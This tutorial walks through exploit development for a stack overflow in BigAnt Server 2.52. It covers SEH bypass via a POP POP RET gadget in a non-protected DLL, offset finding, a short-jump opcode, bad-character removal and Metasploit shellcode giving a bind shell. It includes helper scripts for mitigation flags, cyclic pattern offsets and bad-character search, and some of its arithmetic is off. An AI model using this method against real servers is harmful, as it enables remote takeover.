In this article I will try to exploit BigAnt Server SP5 version 2.52. This application uses Structured Exception Handling (SEH) as a safeguard against errors, which the exploit has to deal with. The first thing I do is analyze the application's network traffic to identify the port it listens on.
After obtaining the required information, I put together a Python script as a fuzzer, shown below.
With the fuzzer built, we attach the AntServer service (port 6660) in Immunity Debugger.
Once BigAnt is running, run the fuzzer designed earlier so that it transmits its data packets to the application.
After running the fuzzer, watch in Immunity Debugger how memory changes because of the amount of data the fuzzer sent to the application; it looks like this.
ESI can be seen in memory filled with the character "A", but EIP is not overwritten. This shows that the application is protected by SEH, so to see it we open the SEH Chain.
The data buffer that was sent is visible and stored in the SEH Chain; to continue into EIP, press SHIFT + F9.
At the bottom of the stack window the rows of ASCII "A" characters show the stack memory being overwritten; do a memory dump to see the data buffer in memory.
Moving to the memory stack view on the left, I open a DLL from the executable modules list. I chose VBAJET32.DLL because this file does not have the IMAGE DLL Characteristics NO SEH flag set; that flag is a security feature that stops the module's memory from being used for exception-handler addresses the loader does not recognize. To verify this, copy the file to Backtrack and analyze it further with Metasploit's msfpescan tool. Back in the executable modules list, choose VBAJET32.DLL.
At this stage we need to find a POP R32, POP R32, RETN sequence to use as the base for EIP; with it SEH can be bypassed and execution passed straight into EIP, so that we control the value of EIP. Right-click in the upper-left (disassembly) area of the module and look for Search for > Sequence of commands.
Fill in the search bar with the sequence, as in the picture, namely POP R32, POP R32, RETN, to find rows with that combination; the page will then show the sequence in question.
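The module check from the step above, as an added example that is not part of the original post: it reads the DllCharacteristics field of a PE file and reports which opt-in protections the module does not claim. It assumes the file is read into memory; note that NO_SEH means the image declares it has no handlers at all (SafeSEH proper is a handler table in the Load Config directory, which this example does not parse). The header in `build_minimal_pe` is constructed for the demonstration.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* flag bits from the PE/COFF specification
DLLCHAR_DYNAMIC_BASE = 0x0040   # ASLR opt-in
DLLCHAR_NX_COMPAT = 0x0100      # DEP opt-in
DLLCHAR_NO_SEH = 0x0400         # image declares it contains no SEH handlers

def dll_characteristics(pe: bytes) -> int:
    """Read the DllCharacteristics field from a PE image's optional header."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt_hdr = e_lfanew + 4 + 20             # signature + 20-byte COFF file header
    magic = struct.unpack_from("<H", pe, opt_hdr)[0]
    if magic not in (0x10B, 0x20B):          # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ optional headers
    return struct.unpack_from("<H", pe, opt_hdr + 70)[0]

def missing_mitigations(pe: bytes) -> list:
    """Names of the opt-in protections this image does NOT claim."""
    flags = dll_characteristics(pe)
    wanted = [("NO_SEH", DLLCHAR_NO_SEH), ("NX_COMPAT", DLLCHAR_NX_COMPAT),
              ("DYNAMIC_BASE", DLLCHAR_DYNAMIC_BASE)]
    return [name for name, bit in wanted if not flags & bit]

def build_minimal_pe(dll_chars: int) -> bytes:
    """Constructed stand-in for a real DLL: just enough header to be parsed above."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew: PE header follows the DOS stub
    # COFF header: i386, 0 sections, 96-byte optional header, DLL|EXECUTABLE|32BIT
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 96, 0x2102)
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    struct.pack_into("<H", opt, 70, dll_chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)

if __name__ == "__main__":
    # a module like the one picked in the post: none of the flags set
    print(missing_mitigations(build_minimal_pe(0x0000)))
    print(missing_mitigations(build_minimal_pe(0x0540)))
```

Run the checker over every module the debugger lists to see which ones a hardening review should flag.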
After getting the address in question, we can find its offset by replacing the string of repeated characters with a pattern generated by Metasploit's pattern_create, which we put into the fuzzer script's buffer as the payload. The resulting script is as follows.
Then we run the script and look at the value of EIP in order to calculate the byte offset in memory.
After the SEH bypass stage, we can see the value of EIP in the SEH chain, and from it the offset is calculated with Metasploit.
After getting the value of EIP, do the counting to determine the byte offset distance to EIP.
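The offset calculation from the steps above, as an added example that is not from the original post: it reimplements the Aa0Aa1... cyclic pattern scheme of Metasploit's pattern_create and pattern_offset, and adds a helper (my own, not a Metasploit function) that turns the handler dword shown in the SEH Chain into the offsets of nSEH and the handler pointer. The register value is taken as the debugger displays it, as a little-endian dword.

```python
import string

PATTERN_MAX = 26 * 26 * 10 * 3   # 20280 bytes before triplets repeat

def pattern_create(length: int) -> bytes:
    """Cyclic pattern Aa0Aa1...Aa9Ab0...: every 3-byte triplet is unique."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern length exceeds %d bytes" % PATTERN_MAX)

def pattern_offset(register_value: int, length: int = PATTERN_MAX) -> int:
    """Offset in the pattern of the 4 bytes now in a register.
    The debugger shows the register as a dword, e.g. EIP = 0x31614130,
    which is the bytes b'0Aa1' read little-endian from the buffer."""
    needle = register_value.to_bytes(4, "little")
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError("value 0x%08x not found in pattern" % register_value)
    return idx

def seh_offsets(handler_value: int, length: int = PATTERN_MAX) -> tuple:
    """For an overwritten SEH record: (offset of nSEH, offset of the handler).
    The SEH Chain view shows the handler dword; nSEH sits 4 bytes before it."""
    seh = pattern_offset(handler_value, length)
    return seh - 4, seh

if __name__ == "__main__":
    print(pattern_create(24))
    print(pattern_offset(0x31614130))   # bytes '0Aa1' start at offset 2
    print(seh_offsets(0x41346141))      # handler at 12, so nSEH at 8
```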
The resulting offset can be placed in the fuzzer script's variables, and the fuzzer script then turns into this.
After preparing the script like this, I try to run it and watch what happens in Immunity Debugger.
In the SEH Chain we check that the handler is indeed overwritten by the "41" character buffer delivered to the application by the fuzzer.
After getting the SEH address, the next thing to do is bypass it with an address from a module loaded without protection; as before I use VBAJET32.DLL and put an address from it into the fuzzer script.
After drawing up the fuzzer script as in the picture, I try to run it.
The VBAJET32.DLL address now fills the SEH Chain entry, which proves the address is correct; after that, press SHIFT + F9 to continue to the EIP address.
Then press Shift + F7 to view the location in the stack; this proves that the order and flow work correctly. Up to this stage we can conclude that the EIP and SEH addresses have been identified, and the next step is to execute the SEH bypass to reach EIP.
In the picture we can see that only a small number of bytes is available, not enough to insert the payload for the exploit, so we need to move to a location with more space. To do so:
Reading the empty space, there is a large area from 016FFD7C to 16FFFF. To count it we compute 016FFFF-016FFD7C; dropping the common prefix 016F from both values leaves FFF-D7C (4095-3452) = 645, or 0x285 in hex.
Now we can use this interval to store the shellcode and as a base to jump to. In assembly, JMP SHORT has the opcode \xEB\xZZ, where ZZ is a variable giving the distance to jump; for example \xEB\x08 jumps 8 bytes forward. Here I use 6 bytes: 4 bytes to step over the SEH record (a jump that skips SEH) and the other 2 bytes as padding. So the opcodes I insert in the fuzzer script are \xEB\x06\x90\x90. We are not finished here; we still need to add the payload shellcode, which I generate with Metasploit.
After generating the payload, I insert it into the fuzzer script as a variable like this.
Then try to make a connection on port 6666 to IP 192.168.56.101.
This fails to make a connection. Checking the SEH Chain shows that execution does not go to 90909090 but stays in VBAJET32.DLL, which means the payload did not reach EIP, even though the fuzzer did send the data successfully. The solution is to find the bad characters in the shellcode/payload and regenerate the payload without them, which needs careful identification on each payload sent. The bad characters in the payload are 0x00, 0x0a, 0x0d, 0x20, 0x25 and 0x40; here is the payload without them.
Then insert that payload into the fuzzer script again; here is the final script I modified to exploit BigAnt Server.
This succeeds in exploiting the target system. The earlier problem was caused by bad characters inside the payload; the bad character list is 0x00, 0x0a, 0x0d, 0x20, 0x25 and 0x40, and if any one of them is included in the payload it will fail.
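The bad-character search described above, as an added example that is not from the original post: it sends the full 0x01..0xff range, compares what was sent with what appears in the memory dump, and removes one offending byte per round until the dump matches. The target is replaced by a constructed function that reproduces the six bad bytes the post lists; it is not BigAnt's real behaviour.

```python
# 0x00 is assumed bad from the start, as the post does
KNOWN_BAD = (0x00,)

def probe_bytes(exclude) -> bytes:
    """Every byte value 0x01..0xff except those already known to be bad."""
    return bytes(b for b in range(0x01, 0x100) if b not in exclude)

def simulated_target(data: bytes) -> bytes:
    """Constructed stand-in for the service's copy of our buffer (not BigAnt's code):
    0x0a/0x0d terminate the copy, 0x20/0x25/0x40 are stripped out."""
    out = bytearray()
    for b in data:
        if b in (0x0a, 0x0d):
            break
        if b in (0x20, 0x25, 0x40):
            continue
        out.append(b)
    return bytes(out)

def first_divergence(sent: bytes, seen: bytes):
    """Index of the first position where the dump differs from what was sent, or None."""
    for i, b in enumerate(sent):
        if i >= len(seen) or seen[i] != b:
            return i
    return None

def find_bad_chars(observe, already_bad=KNOWN_BAD) -> list:
    """Repeat send-and-compare, dropping one bad byte per round, until the dump matches.
    `observe` stands for 'send the probe and read the memory dump back'."""
    bad = list(already_bad)
    while True:
        probe = probe_bytes(bad)
        i = first_divergence(probe, observe(probe))
        if i is None:
            return sorted(bad)
        bad.append(probe[i])

if __name__ == "__main__":
    print([hex(b) for b in find_bad_chars(simulated_target)])
```

Against a real service, `observe` would be the step of sending the buffer and copying the bytes out of the debugger's memory dump.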